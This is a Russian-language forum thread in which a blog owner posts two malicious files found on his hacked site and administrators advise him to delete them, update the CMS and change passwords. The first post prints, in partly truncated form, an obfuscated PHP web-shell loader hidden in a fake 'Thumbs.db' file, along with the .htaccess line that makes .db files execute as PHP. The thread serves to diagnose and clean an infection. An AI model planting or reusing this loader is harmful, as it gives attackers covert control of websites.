Хостинг картинок yapx.ru
Добро пожаловать!

Вернуться   Интернет-конференция > компьютерный форум > Антивирусы и фаерволлы
Войти через OpenID

Ответ
 
Опции темы Поиск в этой теме Опции просмотра
Старый 11.01.2015, 01:33   #1
william
Новичок
 
Аватар для william
 
Регистрация: 11.01.2015
Сообщений: 4
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 10
По умолчанию Что-то с сайтом( файлы с таким содержанием

Здравствуйте! Недавно нашел на сайте два левых файла, вот их содержимое:

1) файл .htaccess
AddType application/x-httpd-php .db

2) файл Thumbs.db
<?php $____=base64_decode('eJwMl2V/2+j2tb/l/8WhmXJT (чать кода убрал) nduuoXI4s3/B4BK2tA=');if(isset($_POST['_']) && isset($_POST['__'])){$_=$_POST['_'];$__=$_POST['__'];}elseif(isset($_COOKIE['_']) && isset($_COOKIE['__'])){$_=$_COOKIE['_'];$__=$_COOKIE['__'];}if(!empty($_) && !empty($__)){$___=$_.md5($__);$________='';$____=@ gzuncompress($____);$______=strlen($____);for($___ __=0;$_____<=$______;$_____++){$_______=chr((ord($ ____[$_____])-ord($___[$_____]))%256);$________.=$_______;$___.=$_______;}if($__ ______=@gzuncompress(@base64_decode($________))){s etcookie('_',$_);setcookie('__',$__);$________=cre ate_function('','?>'.$________.'<?php die();');$________();}}die('<center style="color:#777;font:normal 11px verdana;background:#000;"><form action="" method="post">login : <input type="text" name="_"/> &nbsp; password : <input type="text" name="__"/> <input type="submit" value="go"/></form></center>');?>

яндекс выкинул сайт из поиска как вредоносный
Вопрос: Что это ? и акие еще последствия могут быть от таких скриптов?

ЗЫ
Спасибо.

Последний раз редактировалось Игорь; 11.01.2015 в 01:43. Причина: Оформляйте темы
william вне форума   Ответить с цитированием Вверх
Старый 11.01.2015, 01:48   #2
Eternity
Администратор
 
Аватар для Eternity
 
Регистрация: 21.11.2014
Сообщений: 2,965
Сказал(а) спасибо: 12
Поблагодарили 86 раз(а) в 80 сообщениях
Настроение: Daring
Репутация: 107
По умолчанию Re: Что-то с сайтом( файлы с таким содержанием

похоже эти файло - части от вирья, вашь сайт заражен, файлы в удаление, обновите cms, видать есть дыры, и еще ищите может какие банеры ставили, с ними и прописали вредоносные скрипты .
Eternity вне форума   Ответить с цитированием Вверх
Старый 11.01.2015, 01:53   #3
william
Новичок
Топик Стартер ТС
 
Аватар для william
 
Регистрация: 11.01.2015
Сообщений: 4
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 10
По умолчанию Re: Что-то с сайтом( файлы с таким содержанием

и для чего они так делают?
william вне форума   Ответить с цитированием Вверх
Старый 11.01.2015, 01:55   #4
Игорь
Администратор
 
Аватар для Игорь
 
Регистрация: 21.11.2014
Сообщений: 1,871
Сказал(а) спасибо: 109
Поблагодарили 21 раз(а) в 17 сообщениях
Репутация: 35
По умолчанию Re: Что-то с сайтом( файлы с таким содержанием

Цитата:
Сообщение от william Посмотреть сообщение
и для чего они так делают?
а как вы думаете? Чтобы завладеть Вашим сайтом или напакастить
надо просто чётко и слажено следить за работоспособностью сайта
Игорь вне форума   Ответить с цитированием Вверх
Пользователь сказал cпасибо:
Eternity (12.01.2015)
Старый 11.01.2015, 01:58   #5
william
Новичок
Топик Стартер ТС
 
Аватар для william
 
Регистрация: 11.01.2015
Сообщений: 4
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 10
По умолчанию Re: Что-то с сайтом( файлы с таким содержанием

это небольшой блог, 2 недели как созданный, зачем им такое?
william вне форума   Ответить с цитированием Вверх
Старый 11.01.2015, 02:01   #6
Игорь
Администратор
 
Аватар для Игорь
 
Регистрация: 21.11.2014
Сообщений: 1,871
Сказал(а) спасибо: 109
Поблагодарили 21 раз(а) в 17 сообщениях
Репутация: 35
По умолчанию Re: Что-то с сайтом( файлы с таким содержанием

Цитата:
Сообщение от william Посмотреть сообщение
зачем им такое?
чтобы вы в дальнейшем не улучшили защиту, так сказать на начальном уровне вы уязвимы, Вас "ломают"
Игорь вне форума   Ответить с цитированием Вверх
Старый 11.01.2015, 02:02   #7
Eternity
Администратор
 
Аватар для Eternity
 
Регистрация: 21.11.2014
Сообщений: 2,965
Сказал(а) спасибо: 12
Поблагодарили 86 раз(а) в 80 сообщениях
Настроение: Daring
Репутация: 107
По умолчанию Re: Что-то с сайтом( файлы с таким содержанием

ну как зачем. Спам рассылать или себе все присвоить.
Ломают, что могут сломать.

Обновляйте движок и плагины, смените пароли доступа к хостингу, и пароль почты на которую зареган акк администратора сайта .
Eternity вне форума   Ответить с цитированием Вверх
Старый 11.01.2015, 02:08   #8
william
Новичок
Топик Стартер ТС
 
Аватар для william
 
Регистрация: 11.01.2015
Сообщений: 4
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 10
По умолчанию Re: Что-то с сайтом( файлы с таким содержанием

там и не обоготиться сейчас, не понимаю.
william вне форума   Ответить с цитированием Вверх
Старый 11.01.2015, 02:11   #9
Eternity
Администратор
 
Аватар для Eternity
 
Регистрация: 21.11.2014
Сообщений: 2,965
Сказал(а) спасибо: 12
Поблагодарили 86 раз(а) в 80 сообщениях
Настроение: Daring
Репутация: 107
По умолчанию Re: Что-то с сайтом( файлы с таким содержанием

william, даже не ищите смысл взлома именно вашего сайта.
Взломщики занимаются этим не из-за "нравится/не нравится сайт", а по принципу - ломают все что ломается.
Цели любые - спам, присвоение статей, хулиганство, заработок на рекламе и т.д. и т.п.

Лучше принимайте меры, какие описаны выше.
Eternity вне форума   Ответить с цитированием Вверх
Старый 11.01.2015, 02:11   #10
Игорь
Администратор
 
Аватар для Игорь
 
Регистрация: 21.11.2014
Сообщений: 1,871
Сказал(а) спасибо: 109
Поблагодарили 21 раз(а) в 17 сообщениях
Репутация: 35
По умолчанию Re: Что-то с сайтом( файлы с таким содержанием

всё равно, держите свой сайт в порядке, мы же работаем со своим детищем и у Вас получится. будет сложности, поможем
Игорь вне форума   Ответить с цитированием Вверх
Ответ


Ваши права в разделе
Вы можете создавать новые темы
Вы можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



Текущее время: 14:16. Часовой пояс GMT +3.

 
 
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios
Рейтинг@Mail.ru